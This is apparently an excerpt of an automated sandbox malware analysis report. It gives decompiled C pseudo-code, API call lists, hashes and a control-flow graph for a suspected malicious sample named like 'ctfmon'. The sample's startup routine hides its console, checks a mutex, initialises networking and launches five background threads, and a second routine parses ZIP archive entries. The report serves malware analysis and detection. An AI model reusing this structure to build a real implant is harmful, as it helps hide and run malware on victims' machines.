                                                • Opcode Fuzzy Hash: 4703906efb4f7ce67b7fe28db45f82afcb91c0e3c59926f70af82b45ace494d6
                                                • Instruction Fuzzy Hash: 9321F535200221DFDF609F68D494EADB7A1FF463A5F054166E8468B140E732F872DBA2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Executed Functions

                                                Function 009693E0 Relevance: 19.6, APIs: 13, Instructions: 68threadsleepCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                C-Code - Quality: 100%
                                                			E009693E0(void* __eflags) {
				void* _t3;
				long _t15;

				FreeConsole();
				SetUnhandledExceptionFilter(E00969300); // executed
				_t3 = E00969310(); // executed
				if(_t3 != 0) {
					Sleep(0xbb8); // executed
					CreateThread(0, 0, E0096AFC0, 0, 0, 0); // executed
					CreateThread(0, 0, E00966D40, 0, 0, 0); // executed
					CreateThread(0, 0, E0096B470, 0, 0, 0); // executed
					CreateThread(0, 0, E00967C20, 0, 0, 0); // executed
					CreateThread(0, 0, E00965200, 0, 0, 0); // executed
					_t15 = GetTickCount();
					if(GetTickCount() - _t15 >= 0xa4cb80) {
						L4:
						ExitProcess(0);
					} else {
						goto L3;
					}
					do {
						L3:
						Sleep(0xea60); // executed
					} while (GetTickCount() - _t15 < 0xa4cb80);
					goto L4;
				}
				return 0;
			}





                                                0x009693e3
                                                0x009693ee
                                                0x009693f4
                                                0x009693fb
                                                0x0096940e
                                                0x00969425
                                                0x00969436
                                                0x00969447
                                                0x00969458
                                                0x00969469
                                                0x00969473
                                                0x0096947e
                                                0x00969492
                                                0x00969494
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00969480
                                                0x00969480
                                                0x00969485
                                                0x0096948b
                                                0x00000000
                                                0x00969480
                                                0x00969402

                                                APIs
                                                • FreeConsole.KERNEL32 ref: 009693E3
                                                • SetUnhandledExceptionFilter.KERNEL32(Function_00009300), ref: 009693EE
                                                  • Part of subcall function 00969310: WSAStartup.WS2_32(00000202,?), ref: 00969335
                                                  • Part of subcall function 00969310: CreateMutexA.KERNELBASE ref: 0096937F
                                                  • Part of subcall function 00969310: GetLastError.KERNEL32 ref: 00969387
                                                  • Part of subcall function 00969310: ReleaseMutex.KERNEL32(00000000), ref: 0096939E
                                                  • Part of subcall function 00969310: CloseHandle.KERNEL32(00000000), ref: 009693A5
                                                • Sleep.KERNELBASE(00000BB8), ref: 0096940E
                                                • CreateThread.KERNELBASE(00000000,00000000,Function_0000AFC0,00000000,00000000,00000000), ref: 00969425
                                                • CreateThread.KERNELBASE(00000000,00000000,Function_00006D40,00000000,00000000,00000000), ref: 00969436
                                                • CreateThread.KERNELBASE(00000000,00000000,Function_0000B470,00000000,00000000,00000000), ref: 00969447
                                                • CreateThread.KERNELBASE(00000000,00000000,Function_00007C20,00000000,00000000,00000000), ref: 00969458
                                                • CreateThread.KERNELBASE(00000000,00000000,Function_00005200,00000000,00000000,00000000), ref: 00969469
                                                • GetTickCount.KERNEL32 ref: 00969471
                                                • GetTickCount.KERNEL32 ref: 00969475
                                                • Sleep.KERNELBASE(0000EA60), ref: 00969485
                                                • GetTickCount.KERNEL32 ref: 00969487
                                                • ExitProcess.KERNEL32 ref: 00969494
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.705573501.0000000000960000.00000040.00000400.00020000.00000000.sdmp, Offset: 00960000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_960000_ctfmon.jbxd
                                                Similarity
                                                • API ID: Create$Thread$CountTick$MutexSleep$CloseConsoleErrorExceptionExitFilterFreeHandleLastProcessReleaseStartupUnhandled
                                                • String ID:
                                                • API String ID: 4116069078-0
                                                • Opcode ID: 7be4ad48fae28e5b27ae5db81a67c4ffe7c821f03399679539072ae93023321f
                                                • Instruction ID: 9d642a6c59776954ba7c26d7847943e38906013c3c307d27cef020743038482e
                                                • Opcode Fuzzy Hash: 7be4ad48fae28e5b27ae5db81a67c4ffe7c821f03399679539072ae93023321f
                                                • Instruction Fuzzy Hash: 81112C317E972876F5702BB55C4BF0D2E049B80F69F314412F30CBE2E089D07445AAAE
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0096F4E0 Relevance: 11.0, APIs: 1, Strings: 5, Instructions: 467COMMONCrypto
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 351 96f4e0-96f510 352 96f516-96f51b 351->352 353 96fae2-96fafb call 970a5d 351->353 352->353 355 96f521-96f525 352->355 357 96f527 call 96f2d0 355->357 358 96f52c-96f539 355->358 357->358 360 96f565-96f568 358->360 361 96f53b-96f53e 358->361 363 96f56a-96f5e5 call 970a5d 360->363 364 96f5e8-96f5ed 360->364 362 96f540-96f562 call 970a5d 361->362 361->363 367 96f5f4-96f5f9 364->367 368 96f5ef call 96ec60 364->368 372 96f654-96f68e call 96e7c0 call 96eca0 367->372 373 96f5fb-96f5fd 367->373 368->367 385 96f690-96f6a9 call 970a5d 372->385 386 96f6ac-96f6b6 call 96e170 372->386 375 96f600-96f604 373->375 377 96f606-96f60a 375->377 378 96f649-96f64e 375->378 377->378 381 96f60c-96f613 377->381 378->375 379 96f650 378->379 379->372 381->378 383 96f615-96f639 call 96e7c0 381->383 387 96f63e-96f646 383->387 391 96f6bb-96f6c0 386->391 387->378 392 96f6c2-96f6ef call 970ab4 call 96e200 391->392 393 96f6fa-96f713 call 970a5d 391->393 400 96f716-96f71f 392->400 401 96f6f1-96f6f7 call 970aaf 392->401 403 96f720-96f733 400->403 401->393 403->403 405 96f735-96f73c 403->405 406 96f740-96f744 405->406 407 96f746-96f74a 406->407 408 96f751-96f753 406->408 407->408 411 96f74c-96f74f 407->411 409 96f755-96f756 408->409 410 96f758-96f75a 408->410 409->406 412 96f75f-96f76f call 975fff 410->412 413 96f75c-96f75d 410->413 411->406 416 96f776-96f786 call 975fff 412->416 417 96f771-96f774 412->417 413->406 420 96f78d-96f79d call 975fff 416->420 421 96f788-96f78b 416->421 417->406 424 96f7a4-96f7b4 call 975fff 420->424 425 96f79f-96f7a2 420->425 421->406 428 96f7b6-96f7b9 424->428 429 96f7bb-96f7be 424->429 425->406 428->406 430 96f7c0-96f7cb 429->430 430->430 431 96f7cd-96f801 430->431 432 96f812-96f847 431->432 433 96f803-96f806 431->433 435 96f84b-96f864 432->435 433->432 434 96f808-96f80b 433->434 434->432 436 96f80d-96f810 434->436 437 96f866 435->437 438 96f86d-96f872 435->438 436->432 436->435 437->438 439 96f874 438->439 440 96f87b-96f87d 438->440 439->440 441 96f886-96f88b 440->441 442 96f87f 440->442 443 96f894-96f901 call 96f350 LocalFileTimeToFileTime 441->443 444 96f88d 441->444 442->441 447 96f907-96f913 443->447 448 96fa9f 443->448 444->443 449 96f924-96f93d 447->449 450 96faa3-96faa5 448->450 451 96f940-96f944 449->451 452 96faa7-96faad call 970aaf 450->452 453 96fab0-96fadf call 970a5d 450->453 454 96f946-96f948 451->454 455 96f960-96f962 451->455 452->453 458 96f95c-96f95e 454->458 459 96f94a-96f950 454->459 461 96f965-96f967 455->461 458->461 459->455 465 96f952-96f95a 459->465 463 96f988-96f9ba 461->463 464 96f969-96f981 461->464 468 96f9bc-96fa05 463->468 469 96fa09-96fa0b 463->469 466 96f983 464->466 467 96f920 464->467 465->451 465->458 466->450 467->449 468->469 470 96fa52-96fa57 469->470 471 96fa0d-96fa4f 469->471 470->448 472 96fa59-96fa9c 470->472 471->470 472->448
                                                C-Code - Quality: 84%
                                                			E0096F4E0(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, signed int _a4, void* _a8) {
				signed int _v8;
				char _v276;
				char _v540;
				unsigned int _v568;
				signed int _v592;
				signed int _v596;
				unsigned int _v604;
				unsigned int _v620;
				struct _FILETIME _v628;
				struct _FILETIME _v636;
				intOrPtr* _v640;
				signed int _v644;
				signed int _v648;
				signed int _v652;
				signed int _v656;
				char _v658;
				char _v659;
				signed int _v660;
				signed int _v664;
				void* __esi;
				signed int _t195;
				signed int _t199;
				signed int _t204;
				signed int _t205;
				signed int _t208;
				void* _t209;
				signed int _t212;
				signed int _t213;
				signed int _t214;
				signed int _t215;
				signed int _t216;
				signed int _t217;
				signed int _t218;
				signed int _t223;
				signed int _t235;
				signed int _t244;
				signed int _t250;
				signed int _t253;
				signed int _t254;
				signed char _t255;
				signed int _t262;
				signed int _t264;
				signed int _t270;
				signed int _t271;
				signed int _t273;
				signed int _t279;
				signed int _t280;
				signed int _t282;
				signed int _t289;
				signed int _t294;
				signed int _t296;
				void* _t307;
				signed int _t312;
				signed int _t319;
				signed int _t328;
				signed int _t330;
				signed char _t334;
				long _t338;
				signed int _t339;
				intOrPtr* _t345;
				signed int _t348;
				signed int _t356;
				signed int _t361;
				unsigned int _t380;
				unsigned int _t382;
				void* _t383;
				signed int _t384;
				signed int _t385;
				signed int _t390;
				intOrPtr _t392;
				signed int* _t395;
				signed int _t409;
				void* _t410;
				void* _t411;
				intOrPtr* _t413;
				void* _t414;
				void* _t416;
				void* _t417;
				void* _t418;
				void* _t419;
				void* _t421;
				signed int _t422;
				signed int _t424;
				signed int _t427;
				signed int _t428;
				void* _t430;

				_t424 = (_t422 & 0xfffffff8) - 0x294;
				_t195 =  *0x98f008; // 0x35554c2f
				_v8 = _t195 ^ _t424;
				_t307 = _a8;
				_t409 = _a4;
				_v652 = _t307;
				_t395 = __ecx;
				_v640 = __ecx;
				if(_t409 < 0xffffffff) {
					L81:
					_pop(_t410);
					__eflags = _v8 ^ _t424;
					return E00970A5D(_v8 ^ _t424, _t410);
				} else {
					_t318 =  *__ecx;
					if(_t409 >=  *((intOrPtr*)( *__ecx + 4))) {
						goto L81;
					} else {
						if( *((intOrPtr*)(__ecx + 4)) != 0xffffffff) {
							E0096F2D0(_t318, __edx);
						}
						_t395[1] = 0xffffffff;
						if(_t409 != _t395[0x4d]) {
							__eflags = _t409 - 0xffffffff;
							if(_t409 != 0xffffffff) {
								_t319 =  *_t395;
								__eflags = _t409 -  *((intOrPtr*)(_t319 + 0x10));
								if(_t409 <  *((intOrPtr*)(_t319 + 0x10))) {
									E0096EC60(_t319);
								}
								_t199 =  *_t395;
								__eflags =  *((intOrPtr*)(_t199 + 0x10)) - _t409;
								if( *((intOrPtr*)(_t199 + 0x10)) < _t409) {
									_t312 = _t409;
									do {
										_t409 =  *_t395;
										__eflags = _t409;
										if(_t409 != 0) {
											__eflags =  *(_t409 + 0x18);
											if( *(_t409 + 0x18) != 0) {
												_t392 =  *((intOrPtr*)(_t409 + 0x10)) + 1;
												__eflags = _t392 -  *((intOrPtr*)(_t409 + 4));
												if(_t392 !=  *((intOrPtr*)(_t409 + 4))) {
													 *((intOrPtr*)(_t409 + 0x10)) = _t392;
													 *((intOrPtr*)(_t409 + 0x14)) =  *((intOrPtr*)(_t409 + 0x14)) +  *((intOrPtr*)(_t409 + 0x48)) + 0x2e +  *((intOrPtr*)(_t409 + 0x50)) +  *((intOrPtr*)(_t409 + 0x4c));
													_t294 = E0096E7C0(_t409, _t409 + 0x28, _t409 + 0x78, 0, 0); // executed
													_t424 = _t424 - 0x10 + 0x1c;
													asm("sbb eax, eax");
													_t296 =  ~_t294 + 1;
													__eflags = _t296;
													 *(_t409 + 0x18) = _t296;
												}
											}
										}
										_t289 =  *_t395;
										__eflags =  *((intOrPtr*)(_t289 + 0x10)) - _t312;
									} while ( *((intOrPtr*)(_t289 + 0x10)) < _t312);
									_t307 = _v652;
								}
								E0096E7C0( *_t395,  &_v620, 0,  &_v540, 0x104); // executed
								_t204 = E0096ECA0( *_t395,  &_v648, __eflags,  &_v652,  &_v664); // executed
								_t427 = _t424 - 0x10 + 0x24;
								__eflags = _t204;
								if(_t204 == 0) {
									_t205 = E0096E170( *( *_t395), _v652, 0); // executed
									_t428 = _t427 + 4;
									__eflags = _t205;
									if(__eflags != 0) {
										L24:
										_pop(_t411);
										__eflags = _v8 ^ _t428;
										return E00970A5D(_v8 ^ _t428, _t411);
									} else {
										_push(_v664);
										_t208 = E00970AB4(_t409, __eflags);
										_t412 = _t208;
										_v656 = _t208;
										_t209 = E0096E200(_t208, 1, _v664,  *( *_t395));
										_t430 = _t428 + 0xc;
										__eflags = _t209 - _v664;
										if(_t209 == _v664) {
											_t328 = 0;
											__eflags = 0;
											 *_t307 =  *( *_t395 + 0x10);
											do {
												_t212 =  *((intOrPtr*)(_t430 + _t328 + 0x88));
												_t328 = _t328 + 1;
												 *((char*)(_t430 + _t328 + 0x18f)) = _t212;
												__eflags = _t212;
											} while (_t212 != 0);
											_t413 =  &_v276;
											while(1) {
												_t213 =  *_t413;
												__eflags = _t213;
												if(_t213 == 0) {
													goto L31;
												}
												L29:
												__eflags =  *((char*)(_t413 + 1)) - 0x3a;
												if( *((char*)(_t413 + 1)) == 0x3a) {
													_t413 = _t413 + 2;
													while(1) {
														_t213 =  *_t413;
														__eflags = _t213;
														if(_t213 == 0) {
															goto L31;
														}
														goto L29;
													}
												}
												L31:
												__eflags = _t213 - 0x5c;
												if(_t213 == 0x5c) {
													_t413 = _t413 + 1;
													while(1) {
														_t213 =  *_t413;
														__eflags = _t213;
														if(_t213 == 0) {
															goto L31;
														}
														goto L29;
													}
												}
												__eflags = _t213 - 0x2f;
												if(_t213 == 0x2f) {
													_t413 = _t413 + 1;
													while(1) {
														_t213 =  *_t413;
														__eflags = _t213;
														if(_t213 == 0) {
															goto L31;
														}
														goto L29;
													}
												}
												_t214 = E00975FFF(_t413, "\\..\\");
												_t430 = _t430 + 8;
												__eflags = _t214;
												if(_t214 != 0) {
													_t61 = _t214 + 4; // 0x4
													_t413 = _t61;
													while(1) {
														_t213 =  *_t413;
														__eflags = _t213;
														if(_t213 == 0) {
															goto L31;
														}
														goto L29;
													}
												}
												_t215 = E00975FFF(_t413, "\\../");
												_t430 = _t430 + 8;
												__eflags = _t215;
												if(_t215 != 0) {
													_t62 = _t215 + 4; // 0x4
													_t413 = _t62;
													while(1) {
														_t213 =  *_t413;
														__eflags = _t213;
														if(_t213 == 0) {
															goto L31;
														}
														goto L29;
													}
												}
												_t216 = E00975FFF(_t413, "/../");
												_t430 = _t430 + 8;
												__eflags = _t216;
												if(_t216 != 0) {
													_t63 = _t216 + 4; // 0x4
													_t413 = _t63;
													while(1) {
														_t213 =  *_t413;
														__eflags = _t213;
														if(_t213 == 0) {
															goto L31;
														}
														goto L29;
													}
													goto L31;
												}
												_t217 = E00975FFF(_t413, "/..\\");
												_t430 = _t430 + 8;
												__eflags = _t217;
												if(_t217 != 0) {
													_t64 = _t217 + 4; // 0x4
													_t413 = _t64;
													continue;
												}
												_t65 = _t307 + 4; // 0x965092
												_t330 = _t65 - _t413;
												__eflags = _t330;
												do {
													_t218 =  *_t413;
													_t413 = _t413 + 1;
													 *((char*)(_t330 + _t413 - 1)) = _t218;
													__eflags = _t218;
												} while (_t218 != 0);
												_t380 = _v568;
												_v660 = _t380 >> 0x0000001e & 0xffffff01;
												_t334 =  !(_t380 >> 0x17) & 0x00000001;
												_t223 = _v620 >> 8;
												_v648 = 0;
												_v652 = 0;
												_v644 = 1;
												__eflags = _t223;
												if(_t223 == 0) {
													L49:
													_t334 = _t380 & 0x00000001;
													_v648 = _t380 >> 0x00000001 & 0xffffff01;
													_v652 = _t380 >> 0x00000002 & 0xffffff01;
													_v660 = _t380 >> 0x00000004 & 0x00000001;
													_t235 = _t380 >> 0x00000005 & 0xffffff01;
													__eflags = _t235;
													_v644 = _t235;
												} else {
													__eflags = _t223 - 7;
													if(_t223 == 7) {
														goto L49;
													} else {
														__eflags = _t223 - 0xb;
														if(_t223 == 0xb) {
															goto L49;
														} else {
															__eflags = _t223 - 0xe;
															if(_t223 == 0xe) {
																goto L49;
															}
														}
													}
												}
												__eflags = _v660;
												_t237 =  !=  ? 0x10 : 0;
												__eflags = _v644;
												 *(_t307 + 0x108) =  !=  ? 0x10 : 0;
												if(_v644 != 0) {
													_t82 = _t307 + 0x108;
													 *_t82 =  *(_t307 + 0x108) | 0x00000020;
													__eflags =  *_t82;
												}
												__eflags = _v648;
												if(_v648 != 0) {
													_t85 = _t307 + 0x108;
													 *_t85 =  *(_t307 + 0x108) | 0x00000002;
													__eflags =  *_t85;
												}
												__eflags = _t334;
												if(_t334 != 0) {
													_t87 = _t307 + 0x108;
													 *_t87 =  *(_t307 + 0x108) | 0x00000001;
													__eflags =  *_t87;
												}
												__eflags = _v652;
												if(_v652 != 0) {
													_t90 = _t307 + 0x108;
													 *_t90 =  *(_t307 + 0x108) | 0x00000004;
													__eflags =  *_t90;
												}
												_t382 = _v604;
												 *(_t307 + 0x124) = _v596;
												 *(_t307 + 0x128) = _v592;
												_v636.dwLowDateTime = E0096F350(_t382 >> 0x10, _t382);
												_v636.dwHighDateTime = _t382;
												LocalFileTimeToFileTime( &_v636,  &_v628);
												_t338 = _v628.dwLowDateTime;
												_t414 = 0;
												__eflags = _v664 - 4;
												_t244 = _v628.dwHighDateTime;
												 *(_t307 + 0x10c) = _t338;
												 *(_t307 + 0x110) = _t244;
												 *(_t307 + 0x114) = _t338;
												 *(_t307 + 0x118) = _t244;
												 *(_t307 + 0x11c) = _t338;
												 *(_t307 + 0x120) = _t244;
												if(_v664 <= 4) {
													L77:
													_t339 = _v656;
												} else {
													_t250 = _v656;
													_v658 = 0;
													_t383 = _t250 + 1;
													while(1) {
														L61:
														_t345 = "UT";
														_v660 =  *(_t414 + _t250) & 0x000000ff;
														_v659 =  *(_t383 + _t414) & 0x000000ff;
														_t253 =  &_v660;
														while(1) {
															_t384 =  *_t253;
															__eflags = _t384 -  *_t345;
															if(_t384 !=  *_t345) {
																break;
															}
															__eflags = _t384;
															if(_t384 == 0) {
																L66:
																_t254 = 0;
															} else {
																_t390 =  *((intOrPtr*)(_t253 + 1));
																_t120 = _t345 + 1; // 0x25000054
																__eflags = _t390 -  *_t120;
																if(_t390 !=  *_t120) {
																	break;
																} else {
																	_t253 = _t253 + 2;
																	_t345 = _t345 + 2;
																	__eflags = _t390;
																	if(_t390 != 0) {
																		continue;
																	} else {
																		goto L66;
																	}
																}
															}
															L68:
															__eflags = _t254;
															if(_t254 == 0) {
																_t385 = _v656;
																_v660 = 0x989680;
																_t255 =  *(_t414 + _t385 + 4) & 0x000000ff;
																_t417 = _t414 + 5;
																_v664 = _t255;
																_v664 = _v664 >> 2;
																_v664 = _v664 & 0x00000001;
																_t348 = _t255 >> 0x00000001 & 0xffffff01;
																_v652 = _t348;
																__eflags = _t255 & 0x00000001;
																if((_t255 & 0x00000001) != 0) {
																	_t361 =  *(_t417 + _t385) & 0x000000ff;
																	_t279 = ((( *(_t417 + _t385 + 3) & 0x000000ff) << 0x00000008 |  *(_t417 + _t385 + 2) & 0x000000ff) << 0x00000008 |  *(_t417 + _t385 + 1) & 0x000000ff) << 8;
																	_t417 = _t417 + 4;
																	_t280 = _t279 | _t361;
																	_t282 = _t280 * _v660 + 0xd53e8000;
																	__eflags = _t282;
																	 *(_t307 + 0x11c) = _t282;
																	asm("adc edx, 0x19db1de");
																	 *(_t307 + 0x120) = _t280 * _v660 >> 0x20;
																	_t385 = _v656;
																	_t348 = _v652;
																}
																__eflags = _t348;
																if(_t348 != 0) {
																	_t356 =  *(_t417 + _t385) & 0x000000ff;
																	_t270 = ((( *(_t417 + _t385 + 3) & 0x000000ff) << 0x00000008 |  *(_t417 + _t385 + 2) & 0x000000ff) << 0x00000008 |  *(_t417 + _t385 + 1) & 0x000000ff) << 8;
																	_t417 = _t417 + 4;
																	_t271 = _t270 | _t356;
																	_t273 = _t271 * _v660 + 0xd53e8000;
																	__eflags = _t273;
																	 *(_t307 + 0x10c) = _t273;
																	asm("adc edx, 0x19db1de");
																	 *(_t307 + 0x110) = _t271 * _v660 >> 0x20;
																}
																__eflags = _v664;
																if(_v664 != 0) {
																	_t262 = ((( *(_t417 + _v656 + 3) & 0x000000ff) << 0x00000008 |  *(_t417 + _v656 + 2) & 0x000000ff) << 0x00000008 |  *(_t417 + _v656 + 1) & 0x000000ff) << 0x00000008 |  *(_t417 + _t386) & 0x000000ff;
																	_t264 = _t262 * _v660 + 0xd53e8000;
																	__eflags = _t264;
																	 *(_t307 + 0x114) = _t264;
																	asm("adc edx, 0x19db1de");
																	 *(_t307 + 0x118) = _t262 * _v660 >> 0x20;
																}
																goto L77;
															} else {
																_t339 = _v656;
																_t383 = _t339 + 1;
																_t414 = _t414 + ( *(_t414 + _t339 + 2) & 0x000000ff) + 4;
																_t125 = _t414 + 4; // 0x4
																__eflags = _t125 - _v664;
																if(_t125 < _v664) {
																	_t250 = _v656;
																	goto L61;
																} else {
																}
															}
															goto L78;
														}
														asm("sbb eax, eax");
														_t254 = _t253 | 0x00000001;
														__eflags = _t254;
														goto L68;
													}
												}
												L78:
												__eflags = _t339;
												if(_t339 != 0) {
													E00970AAF(_t339);
													_t430 = _t430 + 4;
												}
												 *(memcpy( &(_t395[2]), _t307, 0x4b << 2) + 0x134) = _a4;
												_pop(_t416);
												__eflags = _v8 ^ _t430 + 0xc;
												return E00970A5D(_v8 ^ _t430 + 0xc, _t416);
												goto L82;
											}
										} else {
											E00970AAF(_t412);
											_t428 = _t430 + 4;
											goto L24;
										}
									}
								} else {
									_pop(_t418);
									__eflags = _v8 ^ _t427;
									return E00970A5D(_v8 ^ _t427, _t418);
								}
							} else {
								goto L8;
							}
						} else {
							if(_t409 == 0xffffffff) {
								L8:
								 *_t307 =  *( *_t395 + 4);
								 *((char*)(_t307 + 4)) = 0;
								 *(_t307 + 0x108) = 0;
								 *(_t307 + 0x10c) = 0;
								 *(_t307 + 0x110) = 0;
								 *(_t307 + 0x114) = 0;
								 *(_t307 + 0x118) = 0;
								 *(_t307 + 0x11c) = 0;
								 *(_t307 + 0x120) = 0;
								 *(_t307 + 0x124) = 0;
								 *(_t307 + 0x128) = 0;
								_pop(_t419);
								__eflags = _v8 ^ _t424;
								return E00970A5D(_v8 ^ _t424, _t419);
							} else {
								memcpy(_t307,  &(_t395[2]), 0x4b << 2);
								_pop(_t421);
								return E00970A5D(_v8 ^ _t424 + 0xc, _t421);
							}
						}
					}
				}
				L82:
			}

























































































                                                0x0096f4e6
                                                0x0096f4ec
                                                0x0096f4f3
                                                0x0096f4fb
                                                0x0096f4ff
                                                0x0096f502
                                                0x0096f507
                                                0x0096f509
                                                0x0096f510
                                                0x0096fae2
                                                0x0096faef
                                                0x0096faf1
                                                0x0096fafb
                                                0x0096f516
                                                0x0096f516
                                                0x0096f51b
                                                0x00000000
                                                0x0096f521
                                                0x0096f525
                                                0x0096f527
                                                0x0096f527
                                                0x0096f52c
                                                0x0096f539
                                                0x0096f565
                                                0x0096f568
                                                0x0096f5e8
                                                0x0096f5ea
                                                0x0096f5ed
                                                0x0096f5ef
                                                0x0096f5ef
                                                0x0096f5f4
                                                0x0096f5f6
                                                0x0096f5f9
                                                0x0096f5fb
                                                0x0096f600
                                                0x0096f600
                                                0x0096f602
                                                0x0096f604
                                                0x0096f606
                                                0x0096f60a
                                                0x0096f60f
                                                0x0096f610
                                                0x0096f613
                                                0x0096f626
                                                0x0096f629
                                                0x0096f639
                                                0x0096f63e
                                                0x0096f643
                                                0x0096f645
                                                0x0096f645
                                                0x0096f646
                                                0x0096f646
                                                0x0096f613
                                                0x0096f60a
                                                0x0096f649
                                                0x0096f64b
                                                0x0096f64b
                                                0x0096f650
                                                0x0096f650
                                                0x0096f66c
                                                0x0096f684
                                                0x0096f689
                                                0x0096f68c
                                                0x0096f68e
                                                0x0096f6b6
                                                0x0096f6bb
                                                0x0096f6be
                                                0x0096f6c0
                                                0x0096f6fa
                                                0x0096f700
                                                0x0096f709
                                                0x0096f713
                                                0x0096f6c2
                                                0x0096f6c2
                                                0x0096f6c6
                                                0x0096f6d0
                                                0x0096f6d7
                                                0x0096f6e3
                                                0x0096f6e8
                                                0x0096f6eb
                                                0x0096f6ef
                                                0x0096f718
                                                0x0096f718
                                                0x0096f71d
                                                0x0096f720
                                                0x0096f720
                                                0x0096f727
                                                0x0096f72a
                                                0x0096f731
                                                0x0096f731
                                                0x0096f735
                                                0x0096f740
                                                0x0096f740
                                                0x0096f742
                                                0x0096f744
                                                0x00000000
                                                0x00000000
                                                0x0096f746
                                                0x0096f746
                                                0x0096f74a
                                                0x0096f74c
                                                0x0096f740
                                                0x0096f740
                                                0x0096f742
                                                0x0096f744
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0096f744
                                                0x0096f740
                                                0x0096f751
                                                0x0096f751
                                                0x0096f753
                                                0x0096f755
                                                0x0096f740
                                                0x0096f740
                                                0x0096f742
                                                0x0096f744
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0096f744
                                                0x0096f740
                                                0x0096f758
                                                0x0096f75a
                                                0x0096f75c
                                                0x0096f740
                                                0x0096f740
                                                0x0096f742
                                                0x0096f744
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0096f744
                                                0x0096f740
                                                0x0096f765
                                                0x0096f76a
                                                0x0096f76d
                                                0x0096f76f
                                                0x0096f771
                                                0x0096f771
                                                0x0096f740
                                                0x0096f740
                                                0x0096f742
                                                0x0096f744
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0096f744
                                                0x0096f740
                                                0x0096f77c
                                                0x0096f781
                                                0x0096f784
                                                0x0096f786
                                                0x0096f788
                                                0x0096f788
                                                0x0096f740
                                                0x0096f740
                                                0x0096f742
                                                0x0096f744
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0096f744
                                                0x0096f740
                                                0x0096f793
                                                0x0096f798
                                                0x0096f79b
                                                0x0096f79d
                                                0x0096f79f
                                                0x0096f79f
                                                0x0096f740
                                                0x0096f740
                                                0x0096f742
                                                0x0096f744
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0096f744
                                                0x00000000
                                                0x0096f740
                                                0x0096f7aa
                                                0x0096f7af
                                                0x0096f7b2
                                                0x0096f7b4
                                                0x0096f7b6
                                                0x0096f7b6
                                                0x00000000
                                                0x0096f7b6
                                                0x0096f7bb
                                                0x0096f7be
                                                0x0096f7be
                                                0x0096f7c0
                                                0x0096f7c0
                                                0x0096f7c2
                                                0x0096f7c5
                                                0x0096f7c9
                                                0x0096f7c9
                                                0x0096f7cd
                                                0x0096f7e0
                                                0x0096f7ea
                                                0x0096f7ed
                                                0x0096f7f0
                                                0x0096f7f5
                                                0x0096f7fa
                                                0x0096f7ff
                                                0x0096f801
                                                0x0096f812
                                                0x0096f818
                                                0x0096f820
                                                0x0096f82e
                                                0x0096f839
                                                0x0096f842
                                                0x0096f842
                                                0x0096f847
                                                0x0096f803
                                                0x0096f803
                                                0x0096f806
                                                0x00000000
                                                0x0096f808
                                                0x0096f808
                                                0x0096f80b
                                                0x00000000
                                                0x0096f80d
                                                0x0096f80d
                                                0x0096f810
                                                0x00000000
                                                0x00000000
                                                0x0096f810
                                                0x0096f80b
                                                0x0096f806
                                                0x0096f852
                                                0x0096f856
                                                0x0096f859
                                                0x0096f85e
                                                0x0096f864
                                                0x0096f866
                                                0x0096f866
                                                0x0096f866
                                                0x0096f866
                                                0x0096f86d
                                                0x0096f872
                                                0x0096f874
                                                0x0096f874
                                                0x0096f874
                                                0x0096f874
                                                0x0096f87b
                                                0x0096f87d
                                                0x0096f87f
                                                0x0096f87f
                                                0x0096f87f
                                                0x0096f87f
                                                0x0096f886
                                                0x0096f88b
                                                0x0096f88d
                                                0x0096f88d
                                                0x0096f88d
                                                0x0096f88d
                                                0x0096f894
                                                0x0096f89e
                                                0x0096f8ab
                                                0x0096f8b6
                                                0x0096f8c3
                                                0x0096f8c8
                                                0x0096f8ce
                                                0x0096f8d2
                                                0x0096f8d4
                                                0x0096f8d9
                                                0x0096f8dd
                                                0x0096f8e3
                                                0x0096f8e9
                                                0x0096f8ef
                                                0x0096f8f5
                                                0x0096f8fb
                                                0x0096f901
                                                0x0096fa9f
                                                0x0096fa9f
                                                0x0096f907
                                                0x0096f907
                                                0x0096f90b
                                                0x0096f910
                                                0x0096f924
                                                0x0096f924
                                                0x0096f928
                                                0x0096f92d
                                                0x0096f935
                                                0x0096f939
                                                0x0096f940
                                                0x0096f940
                                                0x0096f942
                                                0x0096f944
                                                0x00000000
                                                0x00000000
                                                0x0096f946
                                                0x0096f948
                                                0x0096f95c
                                                0x0096f95c
                                                0x0096f94a
                                                0x0096f94a
                                                0x0096f94d
                                                0x0096f94d
                                                0x0096f950
                                                0x00000000
                                                0x0096f952
                                                0x0096f952
                                                0x0096f955
                                                0x0096f958
                                                0x0096f95a
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0096f95a
                                                0x0096f950
                                                0x0096f965
                                                0x0096f965
                                                0x0096f967
                                                0x0096f988
                                                0x0096f98c
                                                0x0096f994
                                                0x0096f999
                                                0x0096f99e
                                                0x0096f9a2
                                                0x0096f9a7
                                                0x0096f9ae
                                                0x0096f9b4
                                                0x0096f9b8
                                                0x0096f9ba
                                                0x0096f9d5
                                                0x0096f9d9
                                                0x0096f9dc
                                                0x0096f9df
                                                0x0096f9e5
                                                0x0096f9e5
                                                0x0096f9ea
                                                0x0096f9f0
                                                0x0096f9f8
                                                0x0096f9fe
                                                0x0096fa05
                                                0x0096fa05
                                                0x0096fa09
                                                0x0096fa0b
                                                0x0096fa26
                                                0x0096fa2a
                                                0x0096fa2d
                                                0x0096fa30
                                                0x0096fa36
                                                0x0096fa36
                                                0x0096fa3b
                                                0x0096fa41
                                                0x0096fa49
                                                0x0096fa4f
                                                0x0096fa52
                                                0x0096fa57
                                                0x0096fa7d
                                                0x0096fa83
                                                0x0096fa83
                                                0x0096fa88
                                                0x0096fa8e
                                                0x0096fa96
                                                0x0096fa9c
